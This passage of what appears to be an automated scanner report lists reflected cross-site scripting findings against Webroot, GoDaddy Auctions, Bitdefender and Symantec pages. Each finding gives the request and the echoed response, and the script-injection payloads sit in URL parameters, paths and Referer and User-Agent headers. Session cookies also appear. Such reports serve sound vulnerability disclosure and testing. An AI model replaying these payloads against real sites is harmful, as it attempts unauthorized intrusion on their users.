<link rel="canonical" href="http:///En_US/case-study/saas-technology-cloud-computing.html?8c3b3"><script>alert(1)</script>4078136ea2c=1" />
...[SNIP]...
4.214. http://www.webroot.com/En_US/case-study/saas-technology-cloud-computing.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/saas-technology-cloud-computing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bafe"-alert(1)-"9761630f095 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/saas-technology-cloud-computing.html?7bafe"-alert(1)-"9761630f095=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22140


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
="text/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/case-study/saas-technology-cloud-computing.html?7bafe"-alert(1)-"9761630f095=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...
4.215. http://www.webroot.com/En_US/case-study/web-email-security-TTCU.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/web-email-security-TTCU.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5364"><script>alert(1)</script>5d3b3a60c04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/web-email-security-TTCU.html?b5364"><script>alert(1)</script>5d3b3a60c04=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22050


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
<link rel="canonical" href="http:///En_US/case-study/web-email-security-TTCU.html?b5364"><script>alert(1)</script>5d3b3a60c04=1" />
...[SNIP]...
4.216. http://www.webroot.com/En_US/case-study/web-email-security-TTCU.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/web-email-security-TTCU.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 888fb"-alert(1)-"36b8ce0e9e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/web-email-security-TTCU.html?888fb"-alert(1)-"36b8ce0e9e3=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22021


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
ipt type="text/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/case-study/web-email-security-TTCU.html?888fb"-alert(1)-"36b8ce0e9e3=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...
4.217. http://www.webroot.com/En_US/case-study/web-security-supreme-court-georgia.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/web-security-supreme-court-georgia.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4995b"-alert(1)-"73faef56208 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/web-security-supreme-court-georgia.html?4995b"-alert(1)-"73faef56208=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21601


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
ext/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/case-study/web-security-supreme-court-georgia.html?4995b"-alert(1)-"73faef56208=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...
4.218. http://www.webroot.com/En_US/case-study/web-security-supreme-court-georgia.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/web-security-supreme-court-georgia.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c09b7"><script>alert(1)</script>4c5e9a3937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/web-security-supreme-court-georgia.html?c09b7"><script>alert(1)</script>4c5e9a3937=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21629


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
<link rel="canonical" href="http:///En_US/case-study/web-security-supreme-court-georgia.html?c09b7"><script>alert(1)</script>4c5e9a3937=1" />
...[SNIP]...
4.219. http://www.webroot.com/En_US/case-study/web-security-toshiba.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/web-security-toshiba.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9662"-alert(1)-"bbfc101f977 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/web-security-toshiba.html?c9662"-alert(1)-"bbfc101f977=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22201


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
script type="text/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/case-study/web-security-toshiba.html?c9662"-alert(1)-"bbfc101f977=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...
4.220. http://www.webroot.com/En_US/case-study/web-security-toshiba.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/web-security-toshiba.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a07"><script>alert(1)</script>f734556fb19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/web-security-toshiba.html?17a07"><script>alert(1)</script>f734556fb19=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22231


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
<link rel="canonical" href="http:///En_US/case-study/web-security-toshiba.html?17a07"><script>alert(1)</script>f734556fb19=1" />
...[SNIP]...
4.221. http://www.webroot.com/download/trial/WRInstallSnr_0.exe [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /download/trial/WRInstallSnr_0.exe

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 128fc<img%20src%3da%20onerror%3dalert(1)>d0f95acf3b5 was submitted in the REST URL parameter 3. This input was echoed as 128fc<img src=a onerror=alert(1)>d0f95acf3b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /download/trial/128fc<img%20src%3da%20onerror%3dalert(1)>d0f95acf3b5?bjpc=64021&vcode=DT02A&rc=%3C?php%20echo%20$rc_code;%20?%3E HTTP/1.1
Host: www.webroot.com
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/land-ss-promo-freescan.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WRSID=53806c0679aadc2e5c9ced35171f7aa7; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=check#true#1303044984|session#1303044923199-20205#1303046784|PC#1303044923199-20205.17#1318856127; s_nr=1303044930733; s_lv=1303044930735; s_lv_s=First%20Visit; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.1.10.1303044931; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_sq=webrootglobalprod%2Cwebrootprod%3D%2526pid%253DEn_US%252520%25257C%252520Consumer%252520%25257C%252520Landing%252520%25257C%252520Land-ss-promo-freescan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.webroot.com%25252Fshoppingcart%25252Ftryme.php%25253Fbjpc%25253D64021%252526vcode%25253DDT02A%252526rc%25253D%2525253C%25253Fphp%25252520echo%25252520%252524rc_code%25253B%2525252%2526ot%253DA

Response

HTTP/1.1 404 File Not Found
Date: Sun, 17 Apr 2011 13:03:30 GMT
Server: Apache
Content-Length: 66
Content-Type: text/html

<h1>404 Not Found</h1>128fc<img src=a onerror=alert(1)>d0f95acf3b5
4.222. https://auctions.godaddy.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload dbffc--><script>alert(1)</script>cfbb479af99 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=dbffc--><script>alert(1)</script>cfbb479af99

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 253079
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=apupmevv1bo5rs3zqbtipbnx; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=http://www.google.com/search?hl=en&q=dbffc--><script>alert(1)</script>cfbb479af99&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=M1PWTDNAMWEB004&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 16 Apr 2011 14:00:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
<!-- WEB004 [1] http://www.google.com/search?hl=en&q=dbffc--><script>alert(1)</script>cfbb479af99 [2] False [3] [4] [5] [6] [7] apupmevv1bo5rs3zqbtipbnx [8] [9] -2 [10] False -->
...[SNIP]...
4.223. https://myaccount.bitdefender.com/site/MyAccount/login/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://myaccount.bitdefender.com
Path:   /site/MyAccount/login/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190db"><script>alert(1)</script>8ce41158f11 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /site/MyAccount/login/ HTTP/1.1
Host: myaccount.bitdefender.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _country=us; s_vi=[CS]v1|26D5718A851D098B-40000144C01B87EA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D
Referer: 190db"><script>alert(1)</script>8ce41158f11

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:53:15 GMT
Server: Apache
Set-Cookie: PHPSESSID=nffhfnfpnkruua6ffqj0uj2s43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=3, max=150
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 17612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>MyAccount - Login</title>


<m
...[SNIP]...
<form name="loginForm" action="https://myaccount.bitdefender.com/site/MyAccount/login?redirect=190db"><script>alert(1)</script>8ce41158f11" method="POST" OnSubmit="return MyAccount.formCheckLogin(this);">
...[SNIP]...
4.224. http://security.symantec.com/sscv6/getbrowser.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/getbrowser.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d426'-alert(1)-'dcc4deed985 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/getbrowser.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;
Referer: http://www.google.com/search?hl=en&q=8d426'-alert(1)-'dcc4deed985

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11575
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:04 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
nknown_country";

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: get browser';

   var strReferrer = 'http://www.google.com/search?hl=en&q=8d426'-alert(1)-'dcc4deed985';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...
4.225. http://security.symantec.com/sscv6/getbrowser.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/getbrowser.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload a69f8<script>alert(1)</script>6baef5bbea5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/getbrowser.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a69f8<script>alert(1)</script>6baef5bbea5
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11551
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:02 GMT
Cache-control: private


<html>
